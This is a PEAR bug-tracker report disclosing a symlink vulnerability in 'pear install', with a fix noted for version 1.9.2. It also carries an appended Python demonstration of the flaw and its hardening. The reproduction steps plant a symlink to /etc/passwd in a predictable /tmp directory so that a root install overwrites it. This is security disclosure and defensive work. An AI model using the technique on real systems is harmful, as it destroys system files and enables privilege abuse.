Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1
ID: 18056
Updated by: [email protected]
Reported By: ondrej at sury dot org
Summary: [SECURITY]: Symlink attack in PEAR install
-Status: Assigned
+Status: Closed
Type: Bug
Package: PEAR
Operating System: Linux
Package Version: 1.9.1
PHP Version: 5.3.3
Assigned To: dufuz
Roadmap Versions:
New Comment:
-Status: Assigned
+Status: Closed
This bug has been fixed in SVN.
If this was a documentation problem, the fix will appear on pear.php.net
by the end of next Sunday (CET).
If this was a problem with the pear.php.net website, the change should
be live shortly.
Otherwise, the fix will appear in the package's next release.
Thank you for the report and for helping us make PEAR better.
The fixes have been committed and an advisory will be posted when the
release happens, in the next day or two.
Look for the 1.9.2 release when it gets posted.
Previous Comments:
------------------------------------------------------------------------
[2010-12-29 13:21:56] ondrej
Hi, thanks for working on the fix.
You should probably request a CVE, since you are the owner of the
project. I guess you can ask on internals how to do that.
Ondrej
------------------------------------------------------------------------
[2010-12-29 05:06:55] dufuz
A fix is coming soon, sorry for the delays. As for the CVE, is that
something you (or any of the Debian people) want to take care of?
------------------------------------------------------------------------
[2010-12-08 01:35:29] dufuz
-Assigned To:
+Assigned To: dufuz
------------------------------------------------------------------------
[2010-11-14 15:29:11] ondrej
This should probably get a CVE.
It's already tracked under:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164
http://security-tracker.debian.org/tracker/TEMP-0546164-014755
Bug first reported by Raphael Geisert (one of Debian php5 maintainers).
Ondrej, on behalf of Debian PHP5 maintainers
------------------------------------------------------------------------
[2010-11-14 15:26:39] ondrej
Description:
------------
There's a symlink vulnerability when doing PEAR install. PEAR
should really be using $(mktemp) for its directories like
download_dir, cache_dir and tmp_dir, and check whether the
directory doesn't exist.
Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir
/tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp
# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
/tmp/buildd/php5-5.3.3/pear-build-download
# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout
# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10
# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Net_Socket</name>
<channel>pear.php.net</channel>
<summary>Network Socket Interface</summary>
<description>Net_Socket is a class interface to TCP sockets. It
provides blocking
and non-blocking operation, with different reading and writing modes
(byte-wise, block-wise, line-wise and special formats like network
byte-order ip addresses).</description>
<lead>
Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.
Actual result:
--------------
Overwrote /etc/passwd just by creating the right directories and
symlinks.
------------------------------------------------------------------------
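The report's fix recommendation (use a freshly created mktemp-style directory, and never write to a predictable path that another user may have pre-seeded) can be demonstrated in a scratch tree without touching any real system file. The following is an added example written for this page, not PEAR's own code or its patch: it rebuilds the reported setup (a predictable download directory containing a package.xml symlink that points at a stand-in for /etc/passwd), shows that a plain write follows the link, and then shows the two hardened behaviours: an open with O_NOFOLLOW|O_EXCL refuses the planted link, and a tempfile.mkdtemp work directory gives the installer a private, unseeded place to write. All paths, file contents and function names are constructed for the demonstration.

```python
import errno
import os
import shutil
import tempfile

# Constructed stand-ins for the /etc/passwd line and the package.xml shown in the report.
PASSWD_LINE = "root:x:0:0:root:/root:/bin/bash\n"
PACKAGE_XML = b'<?xml version="1.0" encoding="UTF-8"?>\n<package>Net_Socket</package>\n'


def unsafe_write(dir_path: str, name: str, data: bytes) -> str:
    """The pattern the report describes: write to a fixed, predictable path in a
    directory another user can create first.  open() follows symlinks, so a
    planted dir/name -> target link redirects the write into the target."""
    path = os.path.join(dir_path, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def safe_write(dir_path: str, name: str, data: bytes) -> str:
    """Hardened form: O_NOFOLLOW refuses to traverse a symlink at the final path
    component and O_EXCL refuses to reuse anything already present, so a planted
    link raises OSError (EEXIST or ELOOP) instead of writing through it."""
    path = os.path.join(dir_path, name)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def private_work_dir(prefix: str = "pear-") -> str:
    """The $(mktemp) approach the report asks for: a fresh, unpredictable,
    owner-only directory that did not exist before this call, so nobody could
    have seeded it with symlinks ahead of time."""
    return tempfile.mkdtemp(prefix=prefix)


def run_scenario() -> dict:
    """Rebuild the report's setup inside a scratch tree and compare behaviours.
    Returns flags describing what happened; nothing outside the scratch tree
    is read or written."""
    unsafe_clobbered = safe_refused = victim_intact = fresh_dir_ok = False
    root = tempfile.mkdtemp(prefix="symlink-demo-")
    try:
        victim = os.path.join(root, "passwd")  # constructed stand-in for /etc/passwd
        with open(victim, "w") as fh:
            fh.write(PASSWD_LINE)

        # Predictable, world-readable download_dir with package.xml -> victim,
        # mirroring "ln -s /etc/passwd package.xml" from the report.
        shared = os.path.join(root, "pear-build-download")
        os.mkdir(shared, 0o755)
        os.symlink(victim, os.path.join(shared, "package.xml"))

        # 1. Vulnerable pattern: the write follows the link into the victim file.
        unsafe_write(shared, "package.xml", PACKAGE_XML)
        with open(victim, "rb") as fh:
            unsafe_clobbered = fh.read().startswith(b"<?xml")
        with open(victim, "w") as fh:  # restore the victim for the next check
            fh.write(PASSWD_LINE)

        # 2. Hardened open in the same tainted directory: refused, victim untouched.
        try:
            safe_write(shared, "package.xml", PACKAGE_XML)
        except OSError as exc:
            safe_refused = exc.errno in (errno.EEXIST, errno.ELOOP)
        with open(victim) as fh:
            victim_intact = fh.read() == PASSWD_LINE

        # 3. Hardened open inside a fresh mkdtemp directory: works normally,
        #    the result is a regular file, and the directory is owner-only.
        work = private_work_dir()
        try:
            written = safe_write(work, "package.xml", PACKAGE_XML)
            with open(written, "rb") as fh:
                fresh_dir_ok = (
                    fh.read() == PACKAGE_XML
                    and not os.path.islink(written)
                    and (os.stat(work).st_mode & 0o077) == 0
                )
        finally:
            shutil.rmtree(work)
    finally:
        shutil.rmtree(root)

    return {
        "unsafe_clobbered": unsafe_clobbered,
        "safe_refused": safe_refused,
        "victim_intact": victim_intact,
        "fresh_dir_ok": fresh_dir_ok,
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

The two hardening steps are independent and worth using together: mkdtemp removes the attacker's chance to pre-create the directory, while O_NOFOLLOW|O_EXCL catches a link that appears anyway (for example in a cache_dir that is deliberately reused across runs). Checking only "does the directory exist" before writing, as the report suggests, still leaves a window between the check and the write, which is why the open flags matter.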